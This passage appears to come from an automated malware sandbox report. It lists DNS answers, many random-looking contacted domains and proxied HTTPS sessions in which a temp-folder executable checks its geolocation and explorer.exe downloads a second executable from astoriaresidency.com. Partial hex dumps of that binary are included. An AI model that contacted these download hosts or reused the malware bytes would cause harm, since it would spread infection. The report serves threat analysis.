Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:33.666680098 CEST	8.8.8.8	192.168.2.3	0x9fc0	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:37.800642014 CEST	8.8.8.8	192.168.2.3	0xea6e	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

astoriaresidency.com

t.me

shsplatform.co.uk

waqxengrru.net

potunulit.org

dhqglbuwd.org

colisumy.com

jripgqryng.org

idbuxqgr.com

pothbr.com

odpck.org

ycoiigtwj.com

vcwvscrxc.org

wvutgbwskj.org

joqdkcg.org

donbnb.com

qlnurflad.org

ntmuxpim.net

hnhrnhttd.com

qthoy.com

dcqrdagr.org

lbmiqvl.com

dyvnuhbcjr.com

zexeq.com

kjuusjyy.com

rlgyg.com

45.9.74.80

uboeway.com

hwcmvhxxsx.net

5.75.213.102:22022

piqkfsrt.net

ocsxwsx.org

rtintbd.org

toobussy.com

dplij.org

wflcv.org

gsbcsgpw.com

lkvtfhq.org

piluifuq.com

gclqyjt.com

mkjcod.com

jpmpaipoai.org

ogyjyxs.com

dibfd.net

nckfeq.net

ybtixpgmd.net

odihsh.net

ddsumlfwh.net

njscsvci.com

ffkbtvwr.com

rextbbqqn.com

eqvhkqvuv.net

ldvbydq.com

johgspytq.org

yfbji.net

vqbiuki.org

lhwny.com

qwnrfooy.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49702	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	Direction	Data
2023-06-21 02:27:39 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:39 UTC	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:39 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:39 UTC	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49706	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:42 UTC	1	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:42 UTC	1	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:42 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:42 UTC	1	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49721	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:56 UTC	212	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:56 UTC	212	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:56 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:56 UTC	212	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49725	103.233.24.19	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:01 UTC	213	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: astoriaresidency.com
2023-06-21 02:28:02 UTC	213	IN	HTTP/1.1 200 OK Date: Wed, 21 Jun 2023 02:28:01 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=f327b620.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-06-21 02:28:02 UTC	213	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$Giiii3iei$>ihiiiiRichiPELK
2023-06-21 02:28:02 UTC	221	IN	Data Raw: 84 29 40 00 80 29 40 00 7c 29 40 00 78 29 40 00 74 29 40 00 70 29 40 00 6c 29 40 00 68 29 40 00 64 29 40 00 60 29 40 00 5c 29 40 00 58 29 40 00 54 29 40 00 50 29 40 00 4c 29 40 00 48 29 40 00 44 29 40 00 40 29 40 00 3c 29 40 00 38 29 40 00 34 29 40 00 30 29 40 00 2c 29 40 00 28 29 40 00 24 29 40 00 20 29 40 00 1c 29 40 00 18 29 40 00 14 29 40 00 08 29 40 00 fc 28 40 00 f4 28 40 00 e8 28 40 00 d0 28 40 00 c4 28 40 00 b0 28 40 00 90 28 40 00 70 28 40 00 50 28 40 00 30 28 40 00 10 28 40 00 ec 27 40 00 d0 27 40 00 ac 27 40 00 8c 27 40 00 64 27 40 00 48 27 40 00 38 27 40 00 34 27 40 00 2c 27 40 00 1c 27 40 00 f8 26 40 00 f0 26 40 00 e4 26 40 00 d4 26 40 00 b8 26 40 00 98 26 40 00 70 26 40 00 48 26 40 00 20 26 40 00 f4 25 40 00 d8 25 40 00 b4 25 40 00 90 25 40 Data Ascii: )@)@\|)@x)@t)@p)@l)@h)@d)@`)@\)@X)@T)@P)@L)@H)@D)@@)@<)@8)@4)@0)@,)@()@$)@ )@)@)@)@)@(@(@(@(@(@(@(@p(@P(@0(@(@'@'@'@'@d'@H'@8'@4'@,'@'@&@&@&@&@&@&@p&@H&@ &@%@%@%@%@
2023-06-21 02:28:02 UTC	221	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:02 UTC	221	IN	Data Raw: 32 30 30 30 0d 0a 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 43 4f 4e 4f 55 54 24 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6e 00 61 00 67 00 65 00 79 00 65 00 76 00 65 00 7a 00 75 00 73 00 61 00 20 00 6e 00 61 00 68 00 69 00 76 00 6f 00 68 00 65 00 78 00 69 00 70 00 65 00 6d 00 65 00 6a 00 65 00 6e 00 61 00 72 00 20 00 67 00 6f 00 62 00 6f 00 6e 00 65 00 7a 00 6f 00 78 00 69 00 77 00 75 00 6c 00 6f 00 79 00 69 00 6c 00 61 00 6b 00 69 00 64 00 69 00 72 00 65 00 77 00 69 00 6a 00 75 00 76 00 65 00 74 00 69 Data Ascii: 2000eWindowMessageBoxAUSER32.DLLSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecCONOUT$bad allocationnageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti
2023-06-21 02:28:02 UTC	229	IN	Data Raw: 06 70 12 40 00 74 Data Ascii: p@t
2023-06-21 02:28:02 UTC	229	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:02 UTC	242	IN	Data Raw: 32 30 30 30 0d 0a 07 56 e8 61 0d 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 8b 08 85 c9 74 11 e8 ee ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 5d c3 8b ff 55 8b ec 51 6a 00 8d 4d fc e8 13 ff ff ff 68 68 a0 42 00 e8 c5 ff ff ff 83 25 68 a0 42 00 00 59 8d 4d fc e8 21 ff ff ff c9 c3 a1 68 a0 42 00 c3 8b ff 55 8b ec 80 3d 8c a0 42 00 00 75 12 68 30 4c 40 00 c6 05 8c a0 42 00 01 e8 18 06 00 00 59 8b 45 08 a3 68 a0 42 00 5d c3 6a 04 b8 d8 3b 42 00 e8 58 23 00 00 6a 00 8d 4d f0 e8 b1 fe ff ff 8b 7d 08 83 65 fc 00 8b 77 0c eb 1f 8b 47 08 4e 8d 04 b0 83 38 00 74 13 8b 08 e8 4f ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 85 f6 77 dd ff 77 08 e8 86 1e 00 00 83 4d fc ff 59 8d 4d f0 e8 95 fe ff ff e8 6e 23 00 00 c3 8b ff 55 8b ec 83 7d 08 00 56 74 2b 8b Data Ascii: 2000VaY^]UEttj]UQjMhhB%hBYM!hBU=Buh0L@BYEhB]j;BX#jM}ewGN8tOtjwwMYMn#U}Vt+
2023-06-21 02:28:02 UTC	250	IN	Data Raw: 89 45 fc 64 8b 1d Data Ascii: Ed
2023-06-21 02:28:02 UTC	250	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:02 UTC	250	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 5f 6c 40 00 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 af 88 00 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 c0 fb ff ff 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 0f 03 00 00 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 83 fb ff ff 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec 38 Data Ascii: 2000dE]mc[XY$XY$XY$UQQSVWd5uE_l@juuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3jVvvjuvu ^]U8
2023-06-21 02:28:02 UTC	258	IN	Data Raw: e8 0a fb ff ff 59 Data Ascii: Y
2023-06-21 02:28:02 UTC	258	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:02 UTC	258	IN	Data Raw: 32 30 30 30 0d 0a ff d0 85 c0 74 1b 6a 00 56 e8 e7 fb ff ff 59 59 ff 15 3c 11 40 00 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 92 fb ff ff 33 c0 5f 5e c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 6a f8 ff ff 8b f8 59 85 ff 75 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 ea f8 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c3 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 ff 75 0c ff 75 08 e8 4d 4a 00 00 8b f8 59 59 85 ff 75 2c 39 45 0c 74 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 Data Ascii: 2000tjVYY<@N3@3_^UVW3ujYu'9BvV@;Bvu_^]UVW3juuu'9BvV@;Bvu_^]UVW3uuMJYYu,9Et'9BvV@;Bv
2023-06-21 02:28:02 UTC	266	IN	Data Raw: ba 03 00 00 00 83 Data Ascii:
2023-06-21 02:28:02 UTC	266	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:03 UTC	266	IN	Data Raw: 32 30 30 30 0d 0a f9 04 72 0c 83 e0 03 2b c8 ff 24 85 14 ac 40 00 ff 24 8d 10 ad 40 00 90 24 ac 40 00 48 ac 40 00 70 ac 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 10 ad 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 10 ad 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 10 ad 40 00 8d 49 00 c4 ac 40 00 cc ac 40 00 d4 ac 40 00 dc ac 40 00 e4 ac 40 00 ec ac 40 00 f4 ac 40 00 07 ad 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 Data Ascii: 2000r+$@$@$@H@p@F#Gr$@IF#GFGr$@F#GFGFGV$@I@@@@@@@@DDDDDDDDDDDDD
2023-06-21 02:28:03 UTC	274	IN	Data Raw: ff 56 56 56 56 56 Data Ascii: VVVVV
2023-06-21 02:28:03 UTC	274	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:04 UTC	274	IN	Data Raw: 32 30 30 30 0d 0a c7 00 16 00 00 00 e8 33 b7 ff ff 83 c4 14 83 c8 ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 20 32 4b 00 8b 06 83 e7 1f c1 e7 06 03 c7 8a 58 24 02 db d0 fb 89 b5 28 e5 ff ff 88 9d 27 e5 ff ff 80 fb 02 74 05 80 fb 01 75 30 8b 4d 10 f7 d1 f6 c1 01 75 26 e8 5c b7 ff ff 33 f6 89 30 e8 40 b7 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 c8 b6 ff ff 83 c4 14 e9 43 06 00 00 f6 40 04 20 74 11 6a 02 6a 00 6a 00 ff 75 08 e8 7e fd ff ff 83 c4 10 ff 75 08 e8 69 07 00 00 59 85 c0 0f 84 9d 02 00 00 8b 06 f6 44 07 04 80 0f 84 90 02 00 00 e8 9d bc ff ff 8b 40 6c 33 c9 39 48 14 8d 85 1c e5 ff ff 0f 94 c1 50 8b 06 ff 34 07 89 8d 20 e5 ff ff ff 15 a0 11 40 00 85 c0 0f 84 60 02 00 00 33 c9 39 8d 20 e5 ff ff 74 08 84 db 0f 84 50 02 00 00 ff 15 9c 11 Data Ascii: 20003SW}4 2KX$('tu0Mu&\30@VVVVVC@ tjjju~uiYD@l39HP4 @`39 tP
2023-06-21 02:28:04 UTC	282	IN	Data Raw: 01 ff 75 e4 e8 55 Data Ascii: uU
2023-06-21 02:28:04 UTC	282	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:04 UTC	282	IN	Data Raw: 31 66 66 38 0d 0a d3 ff ff 59 8b 45 e0 8d 65 c0 5f 5e 5b 8b 4d fc 33 cd e8 ca 83 ff ff c9 c3 8b ff 55 8b ec 8b 4d 08 53 33 db 3b cb 56 57 7c 5b 3b 0d 04 32 4b 00 73 53 8b c1 c1 f8 05 8b f1 8d 3c 85 20 32 4b 00 8b 07 83 e6 1f c1 e6 06 03 c6 f6 40 04 01 74 35 83 38 ff 74 30 83 3d 44 61 42 00 01 75 1d 2b cb 74 10 49 74 08 49 75 13 53 6a f4 eb 08 53 6a f5 eb 03 53 6a f6 ff 15 b0 11 40 00 8b 07 83 0c 06 ff 33 c0 eb 15 e8 1c 97 ff ff c7 00 09 00 00 00 e8 24 97 ff ff 89 18 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 83 f8 fe 75 18 e8 08 97 ff ff 83 20 00 e8 ed 96 ff ff c7 00 09 00 00 00 83 c8 ff 5d c3 56 33 f6 3b c6 7c 22 3b 05 04 32 4b 00 73 1a 8b c8 83 e0 1f c1 f9 05 8b 0c 8d 20 32 4b 00 c1 e0 06 03 c1 f6 40 04 01 75 24 e8 c7 96 ff ff 89 30 e8 ad 96 ff ff Data Ascii: 1ff8YEe_^[M3UMS3;VW\|[;2KsS< 2K@t58t0=DaBu+tItIuSjSjSj@3$_^[]UEu ]V3;\|";2Ks 2K@u$0
2023-06-21 02:28:04 UTC	290	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:04 UTC	290	IN	Data Raw: 92 01 91 be a0 b8 36 0d b4 59 9a ce a6 05 02 8b ad ae 34 48 66 31 4a a0 ae e0 3d bf 90 59 42 a4 9a 11 c0 f5 c9 a5 73 19 64 de 67 dc 78 59 5d 18 3a d5 1b 34 a1 e4 06 7e c0 9d b8 11 cd f6 1f f3 20 10 cb f0 4a 8d 72 47 fd 79 37 2b c5 5e 1f 03 d1 08 86 44 e0 5e e6 da 4c 11 95 fd 3a fa fa ea be 46 65 b9 df 39 c1 33 a6 83 09 27 03 29 fd 8e 59 3f 5c 43 b1 8e 79 ab a9 a8 3e a7 ad 0c 9b 47 87 33 01 25 19 94 78 2d e7 b8 7e 50 17 45 9e bb 33 80 24 da c6 cf 48 04 0e e3 ba 2e 22 01 d5 63 39 b6 c1 1f 63 01 26 4f d5 be e4 3f fb 6f c3 28 5b 8b 48 83 ae 92 94 a5 6d b0 e5 22 4a 5a c2 c5 07 b8 ad 14 e0 f9 cb 4f f1 bb 0f 3f 14 7d 7f ac d8 51 b5 7f e6 df 95 0f e1 6f 84 eb 4a 5d 09 5b 3f 7d 2c 33 e2 e8 b9 5a d2 22 77 d8 35 7b 94 ab c0 ab af 93 be 96 72 ac f3 d5 f9 34 00 8a 05 Data Ascii: 6Y4Hf1J=YBsdgxY]:4~ JrGy7+^D^L:Fe93')Y?\Cy>G3%x-~PE3$H."c9c&O?o([Hm"JZO?}QoJ][?},3Z"w5{r4
2023-06-21 02:28:04 UTC	298	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:04 UTC	298	IN	Data Raw: 32 30 30 30 0d 0a 55 4a e8 39 3f 2c 5b 6f cf b1 3a fd 1b ce 91 34 ef 9e 4c 7b a7 18 05 73 54 9c e6 d2 8e 69 6b 16 38 79 c4 51 d7 c8 44 0a 93 d0 57 06 de 49 d4 34 c9 e0 58 53 e9 41 b1 7d cc 50 be 1b 26 72 45 d5 fe f9 ac 63 3b 0d b8 eb 33 84 b8 5e 79 f4 9f 11 86 ee a9 da 9f 6d 14 5b c7 8e 19 f6 bf 29 76 25 1d db 0b 67 57 f2 c0 a7 5f 25 f8 e3 92 66 d8 0c a8 db 88 37 94 27 cc 15 74 60 b7 1c 76 7a 46 d5 18 e4 74 89 b5 34 81 82 6c 6e 1f 90 1b 31 7e bf fd 6d fb 0e 7d 1d 0f 1b 04 8a b1 30 fd ad 0c 98 a4 99 6c 15 39 1d a7 0d 97 7b ed 3b cf 2d e9 60 cf 02 c5 b1 cd 4b 95 db ab b0 64 3b b0 bb 37 17 bd 2b 8b 6c 5b 67 6f 1c 93 6d bb 1a 75 14 5b 80 97 3a d1 e9 ca 17 8c 22 0f a6 b1 b9 a9 b8 19 d3 e1 fd d1 6b 81 cd 1c 5a 63 96 98 74 69 57 08 4d d9 47 cc 8d 23 cb ce 8f 15 Data Ascii: 2000UJ9?,[o:4L{sTik8yQDWI4XSA}P&rEc;3^ym[)v%gW_%f7't`vzFt4ln1~m}0l9{;-`Kd;7+l[gomu[:"kZctiWMG#
2023-06-21 02:28:04 UTC	306	IN	Data Raw: 9f 48 20 69 46 24 Data Ascii: H iF$
2023-06-21 02:28:04 UTC	306	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:05 UTC	307	IN	Data Raw: 32 30 30 30 0d 0a 72 99 9f 79 23 a1 1b 04 78 6e cf f9 bc 46 4b 1f 1b 2b 27 10 93 01 e4 8a 54 c7 10 f9 d3 33 15 68 f5 f0 05 57 5f cc cd 16 c6 c2 a1 d1 5a 1b d4 74 eb c7 a1 5a b5 ab 19 1a bd 4f f9 99 0b d5 4e 30 3f 6d b4 3d 2e 07 72 32 60 16 b1 8a 6a 9d e0 d3 20 5a f2 82 5a 1b e4 f7 9e 0b cd 51 79 6a 37 ff 1c c6 11 84 77 32 15 74 d7 69 3f 2f 2c 8a 15 3a 0e b4 06 3f 0f 55 5d c6 1d fa ce 8e f0 66 55 4e b7 d3 54 f3 a6 9c dd c9 0e a1 cc 55 e0 d2 ef 59 93 00 61 64 e4 4b 13 27 3a dd dd 41 36 05 68 f0 66 83 f6 07 e3 c8 ec a9 9a 38 f5 84 73 44 7d 6d e7 82 a4 21 21 07 b6 8a 8a 3e 91 9e c6 be cc 21 e2 bc d1 79 c2 5d 0e 96 d7 8d 55 9f 5f 8d cb 9e 7f bf 7d 22 7a 70 6a e4 3f ea 7a a8 4e 47 c5 ac 46 1b 9d d6 1e 9e 4c e6 ad f5 07 7d 0b eb 27 81 d0 ff e7 db d3 d5 9b e0 e7 Data Ascii: 2000ry#xnFK+'T3hW_ZtZON0?m=.r2`j ZZQyj7w2ti?/,:?U]fUNTUYadK':A6hf8sD}m!!>!y]U_}"zpj?zNGFL}'
2023-06-21 02:28:05 UTC	315	IN	Data Raw: 2a 82 72 55 05 c8 Data Ascii: *rU
2023-06-21 02:28:05 UTC	315	IN	Data Raw: 0d 0a Data Ascii:
